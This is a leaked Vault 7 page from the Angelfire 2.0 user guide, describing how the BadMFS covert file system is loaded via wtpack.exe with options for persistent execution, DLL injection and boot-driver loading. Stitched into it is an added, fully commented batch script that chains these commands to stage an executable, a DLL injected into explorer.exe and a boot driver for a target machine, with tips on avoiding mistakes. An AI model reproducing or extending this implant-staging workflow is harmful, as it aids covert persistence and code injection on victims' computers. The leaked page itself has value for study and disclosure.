Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//20341105
3.4 (S) Adding a File To The Covert File System (add transitory file)
(S) To add a file to the BadMFS covert file system, you must create an "add" transitory file. The transitory file is then finalized into the installation binary, which is run on the target. Whenever files are added to the covert file system, a three-digit number is prepended to the file name to encode information about the file for internal Angelfire use. For .exe, .dll, and .sys files, an additional file with a similar name is also created that holds the command line parameters to be passed to that binary. To delete an .exe or .sys file, delete both of the files matching the implant name.
N.B. Multiple files can be added to an “add” transitory file.
Example creation of an add transitory file:

wtpack.exe new add "add_transitory_file"
wtpack.exe update "add_transitory_file" -bp "BadMFS location"
wtpack.exe update "add_transitory_file" -bin "file to add" {sub-options}
3.4.1 (S) Sub-options for -bin
(S) There are several sub-options for the -bin option when adding a binary file to BadMFS. The following list contains all available options. N.B. While most of these are optional, some are required depending on the type of binary being added to the covert store.
Sub-Option / Potential Values / Notes

-execp
    Values: persistent execution interval, in minutes.

-execd
    Values: delay before initial execution, in seconds.

-execa
    Values: absolute execution time.
    Notes: Must be in UTC, in the format YYYY:MM:DD:HH:MM:SS.

-inject
    Values: target process for .dll injection.
    Notes: For .DLL only, and must be specified in that case.

-dtype
    Values: driver type (sys, auto, boot).
    Notes: For .SYS only. Default value is 'auto'.

-cmdline
    Values: command line options.
    Notes: Must be the last option; all contents after this flag are added to the command line. Command lines for .dlls must be of the form "env_var=variable value", to support the NOD persistence spec.
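Putting sections 3.4 and 3.4.1 together, the following batch script is an added example, not code from the Angelfire 2.0 User Guide or from the wtpack.exe tool itself. It strings the documented wtpack.exe commands and -bin sub-options into one "add" transitory file that stages an .exe, a .dll and a .sys. It assumes wtpack.exe is on PATH and returns a nonzero exit code on failure; every file name, BadMFS location, process name and timestamp in it is a placeholder, not a value from the guide.

```batch
@echo off
setlocal
REM Added example, not from the Angelfire 2.0 User Guide. Builds one "add"
REM transitory file using only the wtpack.exe commands and -bin sub-options
REM documented in sections 3.4 and 3.4.1. All names, paths, process names and
REM times below are assumed placeholders; nonzero exit on failure is assumed.

set TFILE=add_transitory_file
set BADMFS=PLACEHOLDER_BADMFS_LOCATION

REM 1. Create the empty "add" transitory file and point it at the covert store.
wtpack.exe new add "%TFILE%" || goto :fail
wtpack.exe update "%TFILE%" -bp "%BADMFS%" || goto :fail

REM 2. An .exe: run every 60 minutes, first run delayed 30 seconds.
REM    -cmdline must be the last sub-option; everything after it becomes the
REM    command line stored in the companion file described in 3.4.
wtpack.exe update "%TFILE%" -bin "example.exe" -execp 60 -execd 30 -cmdline /quiet /log out.txt || goto :fail

REM 3. A .dll: -inject is mandatory for DLLs, and a DLL command line must be
REM    of the form "env_var=value" (NOD persistence spec). Target process is a
REM    placeholder.
wtpack.exe update "%TFILE%" -bin "example.dll" -inject "explorer.exe" -cmdline env_var=example_value || goto :fail

REM 4. A .sys driver: -dtype is .SYS-only (sys, auto, boot; default auto).
REM    -execa takes an absolute UTC time in YYYY:MM:DD:HH:MM:SS (placeholder).
wtpack.exe update "%TFILE%" -bin "example.sys" -dtype boot -execa 2017:01:01:00:00:00 || goto :fail

echo Built "%TFILE%". Finalize it into the installation binary as in 3.4.
endlocal
exit /b 0

:fail
echo wtpack.exe failed (exit code %ERRORLEVEL%) while building "%TFILE%".
endlocal
exit /b 1
```

Two rules from the table are easy to get wrong and are worth checking in any script like this: -cmdline has to be the final sub-option on each update line, because everything after it is taken literally as the command line, and a .dll entry without -inject is incomplete, since the guide makes -inject mandatory for DLLs. Remember also that deleting an .exe or .sys later means removing both the binary and its companion command line file.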
af+mainrepo+Angelfire 2.0 UserGuide 8 of 15